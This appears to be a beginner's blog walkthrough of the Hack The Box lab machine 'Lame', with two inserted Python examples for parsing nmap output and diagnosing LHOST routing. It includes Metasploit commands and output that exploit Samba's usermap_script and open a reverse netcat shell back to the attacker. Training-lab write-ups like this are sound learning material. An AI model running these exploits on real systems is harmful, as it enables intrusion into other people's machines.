My 2021 New Year resolution was to take a shot at learning some penetration testing techniques.
In cybersecurity OSINT plays a big part – especially in pentesting.
But at the same time it is also significantly different from the OSINT that focuses on persons, companies, emails, websites and the general digital footprint.
In pentesting, OSINT can mean anything from passive reconnaissance of the target infrastructure, searching for CVEs, literature research (in absolutely any meaning of the word), to lurking on discussion forums or even reaching out to experts for advice.
That is why I recently signed up to Hack the Box – to do all that; and through it, to learn a ton of new stuff.
So here is my first training machine I managed to hack into.
The name very aptly describes my current pentesting skills – but from here I can only get better.
This walkthrough was conducted using a Linux Parrot virtual machine.
I began with an nmap scan of the machine’s IP address (which is not static, it changes with every instance):
sudo nmap -T4 -A -v -p- 10.129.71.202

-T4 - the timing template, ranging from 0 (slow & stealthy) to 5 (fast & obvious)
-A - aggressive scan: operating system and version detection (it also runs the default scripts and a traceroute)
-v - verbose output
-p- - scan all 65535 ports on the IP address
Scan result summary
The following 5 ports and services were identified:
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
vsftpd is a default FTP (File Transfer Protocol) server for a number of Linux distributions and it’s used for storing and sharing files.
Very clearly this is an obsolete version of the service, one that is highly unlikely to be found in production anymore.
In 2011 the vsftpd 2.3.4 source archive on the project's download site was reported to have been tampered with so that the built server contained a backdoor allowing command execution.
It is worth noting that (as per the screenshot above) it is possible to connect anonymously to the FTP service.
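To turn a scan summary like the one above into a defender's checklist, here is an added Python example (not code from the original post) that parses nmap's normal-output port lines, attaches NSE script lines such as ftp-anon to the port they belong to, and flags end-of-life versions and anonymous FTP. The sample output is constructed from the summary above, and the end-of-life watch-list is an assumption for illustration.

```python
import re

# Constructed sample: the port lines from the scan summary above, plus an
# ftp-anon script line as nmap prints it when anonymous login succeeds.
SAMPLE_NMAP_OUTPUT = """\
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

# Assumed watch-list (not from nmap): product -> end-of-life version prefixes.
EOL_VERSIONS = {"vsftpd": ("2.3.4",), "OpenSSH": ("4.",), "Samba smbd": ("3.0.",)}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_LINE = re.compile(r"^\|\s*(\S+):\s*(.*)$")

def parse_nmap(text):
    """One dict per port line; NSE script lines attach to the preceding port."""
    findings = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            findings.append({"port": int(port), "proto": proto, "state": state,
                             "service": service, "version": version.strip(),
                             "scripts": {}})
            continue
        s = SCRIPT_LINE.match(line)
        if s and findings:
            findings[-1]["scripts"][s.group(1)] = s.group(2)
    return findings

def review(findings):
    """Flag end-of-life versions and anonymous FTP for the defender's follow-up."""
    issues = []
    for f in findings:
        for product, prefixes in EOL_VERSIONS.items():
            if f["version"].startswith(product):
                rest = f["version"][len(product):].strip()
                if any(rest.startswith(p) for p in prefixes):
                    issues.append(f"{f['port']}/{f['proto']}: end-of-life {f['version']}")
        if "allowed" in f["scripts"].get("ftp-anon", ""):
            issues.append(f"{f['port']}/{f['proto']}: anonymous FTP login allowed")
    return issues
```

Running review(parse_nmap(SAMPLE_NMAP_OUTPUT)) reports the FTP, SSH and 445/tcp Samba services plus the anonymous login; the 139/tcp line only reports the 3.X - 4.X range, so it is not flagged.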
I started with launching Metasploit Framework in order to find out more about the exploit instead of relying on online sources:
msfconsole
msf6 > search vsftpd
To make use of this exploit, select it from the list (here we only have 1 option marked with a zero):
I got a message that no payload was configured, but the module then defaults to cmd/unix/interact.
You can display the available options with show options:
exploit(unix/ftp/vsftpd_234_backdoor) > show options
I set the host to the machine’s IP address:
set RHOST 10.129.71.202
Unfortunately, these efforts were met with a message: “Exploit completed, but no session was created”.
I went back to the command line, in order to see if connecting directly to the IP address would work…
msf6 > exit
ftp 10.129.71.202
When prompted here I tried a number of generic user names (user, admin, test, 123, etc.).
It took me a while until I tried “anonymous” (yes, the hint is in the initial scan result).
When prompted for password, I just hit ENTER.
Admittedly, I had no idea what to do next. I found a list of Linux FTP commands here and tried them all one after the other.
NOTE: At this point I took a long break and forgot to extend the uptime on the Lame machine.
This resulted in resetting the IP address, so I relaunched the machine on a new IP – 10.129.89.92.
OpenSSH (Secure Shell) is an encrypted, remote access service.
Version 4.7p1 has some known vulnerabilities listed here.
Searching Metasploit again revealed some exploits for Windows OS, clearly of no use here.
Samba smbd 3.X – 4.X
Samba is a service that provides file and printer sharing options across various operating systems.
Metasploit lists 19 different exploits for the Samba 3 version. Not all of these apply here, as some target Windows or other Unix systems.
I could have tried the relevant exploits one by one, but the better idea is to start with those ranked the highest (excellent).
6 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Samba is_known_pipename() Arbitrary Module Load
The above exploit however seems to require valid credentials, which I did not have. So I tried another:
9 exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)

msf6 exploit > use 9
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/trans2open) > set RHOSTS 10.129.89.92
RHOSTS => 10.129.89.92
msf6 exploit(linux/samba/trans2open) > run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] 10.129.89.92:139 - Trying return address 0xbffffdfc...
[-] 10.129.89.92:139 - Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
[*] Exploit completed, but no session was created.
I unsuccessfully tried a number of times, including the next exploit on the list:
11 exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution

msf6 > use 11
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.89.92
RHOSTS => 10.129.89.92
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Exploit completed, but no session was created.
It took me a while to understand what I was doing wrong here.
msf6 exploit(multi/samba/usermap_script) > options
The key was to understand that both the RHOSTS and LHOST IP addresses must be set correctly:
In my case LHOST had defaulted to 10.0.2.15, the virtual machine's NAT address, which the target cannot reach, so the reverse shell had nowhere to connect back to.
Luckily, the ifconfig command lets you check the tun0 address.
Then simply set LHOST to that IP:
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.101
Once everything is set, time to put the exploit to a test:
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.101:4444
[*] Command shell session 1 opened (10.10.14.101:4444 -> 10.129.89.92:56128) at 2021-01-31 15:20:45 -0500
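To make the LHOST lesson concrete, here is an added Python example (not from the original post) that models the attacking VM's interfaces and routes with a longest-prefix route lookup and explains why a handler on 10.0.2.15 never received a connection while one on the tun0 address did. The interface names and route prefixes are assumptions constructed for illustration.

```python
import ipaddress

# Constructed model of the attacking VM described above: a NAT interface
# (10.0.2.15, the address Metasploit defaulted to) and the VPN tunnel tun0
# (10.10.14.101). Interface names and route prefixes are assumptions.
INTERFACES = {"eth0": "10.0.2.15", "tun0": "10.10.14.101"}
ROUTES = [("0.0.0.0/0", "eth0"), ("10.129.0.0/16", "tun0"), ("10.10.14.0/23", "tun0")]

def egress_interface(target, routes=ROUTES):
    """Longest-prefix match: the interface that carries traffic to target."""
    ip = ipaddress.ip_address(target)
    best = None
    for prefix, iface in routes:
        net = ipaddress.ip_network(prefix)
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best[1] if best else None

def callback_address_ok(lhost, target, routes=ROUTES, interfaces=INTERFACES):
    """A reverse handler only receives the connection if LHOST is the address
    of the interface the target is reached through; a NAT-side address such
    as 10.0.2.15 is not routable from the target's network."""
    iface = egress_interface(target, routes)
    return iface is not None and interfaces.get(iface) == lhost

def explain(lhost, target):
    """Human-readable diagnosis of an 'Exploit completed, but no session' result."""
    iface = egress_interface(target)
    if callback_address_ok(lhost, target):
        return f"LHOST {lhost} is on {iface}, the interface facing {target}: OK"
    return (f"LHOST {lhost} is not on {iface} ({INTERFACES[iface]}); "
            f"{target} cannot connect back, so no session will be created")
```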
Listing directories with the dir command showed the presence of home and root directories.
I navigated with the cd, ls / dir commands between home and root, then searched for text files and used the cat command to grab the flag hash values:
Don’t forget to return both user and root flags and claim ownership of Lame!